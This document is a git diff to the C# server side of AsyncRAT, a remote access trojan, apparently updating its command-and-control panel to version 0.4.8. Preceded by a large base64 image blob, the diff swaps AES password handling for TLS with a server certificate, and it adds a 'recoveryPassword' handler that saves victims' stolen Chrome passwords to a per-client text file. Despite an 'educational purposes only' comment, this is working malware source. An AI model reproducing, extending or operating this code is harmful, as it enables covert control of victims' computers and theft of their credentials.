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 + gg== + + + \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs index 2a86717..758e9d8 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs @@ -12,6 +12,7 @@ using System.Threading; using System.IO; using System.Net.Sockets; using Timer = System.Threading.Timer; +using AsyncRAT_Sharp.Helper; namespace AsyncRAT_Sharp.Forms { @@ -55,14 +56,14 @@ namespace AsyncRAT_Sharp.Forms { try { - byte[] msg = Settings.AES.Encrypt((byte[])obj); + byte[] msg = (byte[])obj; byte[] buffersize = BitConverter.GetBytes(msg.Length); C.ClientSocket.Poll(-1, SelectMode.SelectWrite); Tick = new Timer(new TimerCallback(Timer3), null, 0, 1000); - C.ClientSocket.Send(buffersize); + C.ClientSslStream.Write(buffersize); + C.ClientSslStream.Flush(); int chunkSize = 50 * 1024; byte[] chunk = new byte[chunkSize]; - int SendPackage; using (MemoryStream buffereReader = new MemoryStream(msg)) { BinaryReader binaryReader = new BinaryReader(buffereReader); @@ -71,7 +72,8 @@ namespace AsyncRAT_Sharp.Forms { chunk = binaryReader.ReadBytes(chunkSize); bytesToRead -= chunkSize; - SendPackage = C.ClientSocket.Send(chunk); + C.ClientSslStream.Write(chunk); + C.ClientSslStream.Flush(); BytesSent += chunk.Length; } while (bytesToRead > 0); diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.Designer.cs index a171863..2d66640 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.Designer.cs @@ -32,8 +32,6 @@ this.textPorts = new System.Windows.Forms.TextBox(); this.label1 = new System.Windows.Forms.Label(); this.groupBox1 = new System.Windows.Forms.GroupBox(); - this.label2 = new System.Windows.Forms.Label(); - this.textPassword = new System.Windows.Forms.TextBox(); this.button1 = new System.Windows.Forms.Button(); this.groupBox1.SuspendLayout(); this.SuspendLayout(); @@ -56,36 +54,18 @@ // // groupBox1 // - this.groupBox1.Controls.Add(this.label2); - this.groupBox1.Controls.Add(this.textPassword); this.groupBox1.Controls.Add(this.label1); this.groupBox1.Controls.Add(this.textPorts); this.groupBox1.Location = new System.Drawing.Point(13, 13); this.groupBox1.Name = "groupBox1"; - this.groupBox1.Size = new System.Drawing.Size(558, 160); + this.groupBox1.Size = new System.Drawing.Size(558, 111); this.groupBox1.TabIndex = 2; this.groupBox1.TabStop = false; this.groupBox1.Text = "Settings"; // - // label2 - // - this.label2.AutoSize = true; - this.label2.Location = new System.Drawing.Point(6, 103); - this.label2.Name = "label2"; - this.label2.Size = new System.Drawing.Size(78, 20); - this.label2.TabIndex = 3; - this.label2.Text = "Password"; - // - // textPassword - // - this.textPassword.Location = new System.Drawing.Point(129, 100); - this.textPassword.Name = "textPassword"; - this.textPassword.Size = new System.Drawing.Size(423, 26); - this.textPassword.TabIndex = 2; - // // button1 // - this.button1.Location = new System.Drawing.Point(23, 203); + this.button1.Location = new System.Drawing.Point(23, 146); this.button1.Name = "button1"; this.button1.Size = new System.Drawing.Size(542, 50); this.button1.TabIndex = 0; @@ -97,7 +77,7 @@ // this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; - this.ClientSize = new System.Drawing.Size(583, 265); + this.ClientSize = new System.Drawing.Size(583, 226); this.Controls.Add(this.button1); this.Controls.Add(this.groupBox1); this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); @@ -118,9 +98,7 @@ #endregion private System.Windows.Forms.Label label1; private System.Windows.Forms.GroupBox groupBox1; - private System.Windows.Forms.Label label2; private System.Windows.Forms.Button button1; public System.Windows.Forms.TextBox textPorts; - public System.Windows.Forms.TextBox textPassword; } } \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs index fa473bc..0390c82 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.cs @@ -2,6 +2,9 @@ using System.Windows.Forms; using System.IO; using System.Diagnostics; +using AsyncRAT_Sharp.Helper; +using System.Security.Cryptography.X509Certificates; + namespace AsyncRAT_Sharp.Forms { public partial class FormPorts : Form @@ -15,24 +18,32 @@ namespace AsyncRAT_Sharp.Forms private void PortsFrm_Load(object sender, EventArgs e) { - Methods.FadeIn(this, 5); + Methods.FadeIn(this, 5); textPorts.Text = "6606, 7707, 8808"; if (Properties.Settings.Default.Ports.Length > 0) textPorts.Text = Properties.Settings.Default.Ports; - if (Properties.Settings.Default.Password.Length > 0) - textPassword.Text = Properties.Settings.Default.Password; - this.Text = $"{Settings.Version} | Welcome {Environment.UserName}"; + + if (!File.Exists(Settings.CertificatePath)) + { + using (FormCertificate formCertificate = new FormCertificate()) + { + formCertificate.ShowDialog(); + } + } + else + { + Settings.ServerCertificate = new X509Certificate2(Settings.CertificatePath); + } } private void button1_Click(object sender, EventArgs e) { - if (textPorts.Text.Length > 0 && textPassword.Text.Length > 0) + if (textPorts.Text.Length > 0) { Properties.Settings.Default.Ports = textPorts.Text; - Properties.Settings.Default.Password = textPassword.Text; Properties.Settings.Default.Save(); isOK = true; this.Close(); diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs index a9970bf..c61b3c7 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleFileManager.cs @@ -7,6 +7,7 @@ using System.IO; using System.Windows.Forms; using System.Threading; using System.Threading.Tasks; +using AsyncRAT_Sharp.Helper; namespace AsyncRAT_Sharp.Handle_Packet { diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs index b366eb2..2e4451c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleRemoteDesktop.cs @@ -1,4 +1,5 @@ using AsyncRAT_Sharp.Forms; +using AsyncRAT_Sharp.Helper; using AsyncRAT_Sharp.MessagePack; using AsyncRAT_Sharp.Sockets; using System; diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs index dc12d1c..1035d6c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/Packet.cs @@ -5,6 +5,8 @@ using System.Diagnostics; using System.Drawing; using AsyncRAT_Sharp.Forms; using System.Security.Cryptography; +using System.IO; +using System.Windows.Forms; namespace AsyncRAT_Sharp.Handle_Packet { @@ -19,7 +21,7 @@ namespace AsyncRAT_Sharp.Handle_Packet byte[] data = (byte[])array[0]; client = (Clients)array[1]; MsgPack unpack_msgpack = new MsgPack(); - unpack_msgpack.DecodeFromBytes(Settings.AES.Decrypt(data)); + unpack_msgpack.DecodeFromBytes(data); switch (unpack_msgpack.ForcePathObject("Packet").AsString) { case "ClientInfo": @@ -58,6 +60,15 @@ namespace AsyncRAT_Sharp.Handle_Packet break; } + case "recoveryPassword": + { + if (!Directory.Exists(Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.ID))) + Directory.CreateDirectory(Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.ID)); + File.WriteAllText(Path.Combine(Application.StartupPath, "ClientsFolder\\" + client.ID + "\\ChromePassowrds.txt"), unpack_msgpack.ForcePathObject("Password").AsString); + new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} recovered passwords successfully", Color.Purple); + break; + } + case "Received": { new HandleListView().Received(client); @@ -99,7 +110,7 @@ namespace AsyncRAT_Sharp.Handle_Packet catch (CryptographicException) { new HandleLogs().Addmsg($"Client {client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]} tried to connect with wrong password", Color.Red); - // Settings.Blocked.Add(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]); + // Settings.Blocked.Add(client.ClientSocket.RemoteEndPoint.ToString().Split(':')[0]); client.Disconnected(); return; } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs index cd61575..1459f4c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Helper/Methods.cs @@ -1,11 +1,13 @@ using System; +using System.Text; using System.Threading.Tasks; using System.Windows.Forms; -namespace AsyncRAT_Sharp +namespace AsyncRAT_Sharp.Helper { - static class Methods + public static class Methods { + private const string Alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; public static string BytesToString(long byteCount) { string[] suf = { "B", "KB", "MB", "GB", "TB", "PB", "EB" }; @@ -25,5 +27,15 @@ namespace AsyncRAT_Sharp o.Opacity += 0.05; } } + + public static Random Random = new Random(); + public static string GetRandomString(int length) + { + StringBuilder randomName = new StringBuilder(length); + for (int i = 0; i < length; i++) + randomName.Append(Alphabet[Random.Next(Alphabet.Length)]); + + return randomName.ToString(); + } } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Program.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Program.cs index 1dec6ce..9dee0cd 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Program.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Program.cs @@ -4,6 +4,18 @@ using System.Linq; using System.Threading.Tasks; using System.Windows.Forms; +// │ Author : NYAN CAT +// │ Name : AsyncRAT // Simple RAT + +// Contact Me : https://github.com/NYAN-x-CAT + +// This program Is distributed for educational purposes only. + +// Credits; +// Serialization @ymofen +// StreamLibrary @Dergan +// Special Thanks MaxXor@hf gigajew@hf + namespace AsyncRAT_Sharp { static class Program diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs index 256d970..5d999e5 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs @@ -174,6 +174,16 @@ namespace AsyncRAT_Sharp.Properties { } } + /// + /// Looks up a localized resource of type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap key { + get { + object obj = ResourceManager.GetObject("key", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx index 48843c2..9d39e4c 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx @@ -154,6 +154,9 @@ ..\Resources\filemanager.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + ..\Resources\remotedesktop.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a @@ -187,7 +190,7 @@ ..\Resources\visit.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - ..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\key.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs index 1f5fe2b..29a1fde 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.Designer.cs @@ -35,18 +35,6 @@ namespace AsyncRAT_Sharp.Properties { } } - [global::System.Configuration.UserScopedSettingAttribute()] - [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] - [global::System.Configuration.DefaultSettingValueAttribute("")] - public string Password { - get { - return ((string)(this["Password"])); - } - set { - this["Password"] = value; - } - } - [global::System.Configuration.UserScopedSettingAttribute()] [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] [global::System.Configuration.DefaultSettingValueAttribute("")] diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.settings b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.settings index aad7ab9..b3dd690 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.settings +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Settings.settings @@ -5,9 +5,6 @@ - - - diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/AsyncRAT-Sharp.exe.config b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/AsyncRAT-Sharp.exe.config index 61bc085..67f88a7 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/AsyncRAT-Sharp.exe.config +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/AsyncRAT-Sharp.exe.config @@ -11,22 +11,19 @@ - - - - + - + - + False - + diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/key.png b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/key.png new file mode 100644 index 0000000000000000000000000000000000000000..da11779c0e8158049fe7461bcd483fcea68db406 GIT binary patch literal 828 zcmeAS@N?(olHy`uVBq!ia0vp^3LwnE0wix1Z>k4UEa{HEjtmSN`?>!lvVtU&J%W50 z7^>757#dm_7=8hT8eT9klo~KFyh>nTu$sZZAYL$MSD+10f+@+{-GzZ+Rj;xUkjGiz z5n0T@z;^_M8K-LVNdpDhOFVsD*&nlV3z^7#&Jm6VYU1*AaSZV|KKE*D#@Rxd;~%G6 zww-kjx;(*yQ!~#;bIIKbt!GZra+{`c3yJ5gS!0tTUgZ45>DCTqenpY2n2e0*xl51i zm}%ts%UhdiN-M?$<-+zC<@?ZU@t3JQ)e2$ynvVGlZLsk9B>rP6k zu-vz~^kkNL9p^ragc`*kGPzC9wf@ht^PIZl!NQk6KNQ_%yW&>TW#W+)K8sub+oc7k zdQ8%qW1l6if8eHfF!A8Oo;6pr9WSisN@tzD`Jw8*EOR~OTmhL)x1{g)gumKcVRkU= zU|--%-}wgx4>Dchp61G}Cv8v~Qsoph_o>w%fx}4$FJ>Gxo-6p$q|nh|h1%3FyM($$ z&V15T@?EjPb>{M2L7x4eG7e5SIq~O$Xvyh!<3%h#cJKTYzR}3`VpG^>-Ba2T`p-(Y zEa08}iE9;awZPSg7n9?(KR@v1-91Y-emcAU#dY`hXzba|P}B9h>F&*sXTzQz&_1Fn zd%Ewsl;?K!9V>2{J?%PjX6xlxPtL15KdQNE{@IogA;2Rk$igW;rI$6| zb7!_XqbIW5HNNU=aFdw-8%>%1g)W<|PKIncd;ZWzd+Q$)>b@U$EBc?msNCSN>V_jy z%fI&e9o=IEp-h{bqx(e z49%=ejjW6;v<-}`3=9J9aw?%{$jwj5OsmALL9t=uJfH?ikPX54X(i=}MX3zs<>h*r fdD+Fui3O>8`9 Online = new List(); public static List Blocked = new List(); public static string Port { get; set; } public static long Sent { get; set; } public static long Received { get; set; } - public static string Password { get; set; } - public static Aes256 AES{ get; set; } - public static readonly string Version = "AsyncRAT 0.4.7"; + public static string CertificatePath = Application.StartupPath + "\\ServerCertificate.p12"; + public static X509Certificate2 ServerCertificate; + public static readonly string Version = "AsyncRAT 0.4.8"; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs index b2f63ca..b1ce66f 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Socket/Clients.cs @@ -9,12 +9,15 @@ using System.Diagnostics; using System.Threading; using AsyncRAT_Sharp.MessagePack; using System.Text; +using System.Net.Security; +using System.Security.Authentication; namespace AsyncRAT_Sharp.Sockets { public class Clients { public Socket ClientSocket { get; set; } + public SslStream ClientSslStream { get; set; } public ListViewItem LV { get; set; } public ListViewItem LV2 { get; set; } public string ID { get; set; } @@ -23,15 +26,29 @@ namespace AsyncRAT_Sharp.Sockets private bool ClientBufferRecevied { get; set; } private MemoryStream ClientMS { get; set; } public object SendSync { get; } = new object(); - private object EndSendSync { get; } = new object(); public long BytesRecevied { get; set; } public Clients(Socket socket) { ClientSocket = socket; - ClientBuffer = new byte[4]; - ClientMS = new MemoryStream(); - ClientSocket.BeginReceive(ClientBuffer, 0, ClientBuffer.Length, SocketFlags.None, ReadClientData, null); + ClientSslStream = new SslStream(new NetworkStream(ClientSocket, true), false); + ClientSslStream.BeginAuthenticateAsServer(Settings.ServerCertificate, false, SslProtocols.Tls, false, EndAuthenticate, null); + } + + private void EndAuthenticate(IAsyncResult ar) + { + try + { + ClientSslStream.EndAuthenticateAsServer(ar); + ClientBuffer = new byte[4]; + ClientMS = new MemoryStream(); + ClientSslStream.BeginRead(ClientBuffer, 0, ClientBuffer.Length, ReadClientData, null); + } + catch + { + ClientSslStream?.Dispose(); + ClientSocket?.Dispose(); + } } public async void ReadClientData(IAsyncResult ar) @@ -45,30 +62,32 @@ namespace AsyncRAT_Sharp.Sockets } else { - int Recevied = ClientSocket.EndReceive(ar); + int Recevied = ClientSslStream.EndRead(ar); if (Recevied > 0) { + await ClientMS.WriteAsync(ClientBuffer, 0, Recevied); if (!ClientBufferRecevied) { - await ClientMS.WriteAsync(ClientBuffer, 0, ClientBuffer.Length); - ClientBuffersize = BitConverter.ToInt32(ClientMS.ToArray(), 0); - ClientMS.Dispose(); - ClientMS = new MemoryStream(); - if (ClientBuffersize > 0) + if (ClientMS.Length == 4) { - ClientBuffer = new byte[ClientBuffersize]; - Debug.WriteLine("/// Server Buffersize " + ClientBuffersize.ToString() + " Bytes ///"); - ClientBufferRecevied = true; + ClientBuffersize = BitConverter.ToInt32(ClientMS.ToArray(), 0); + 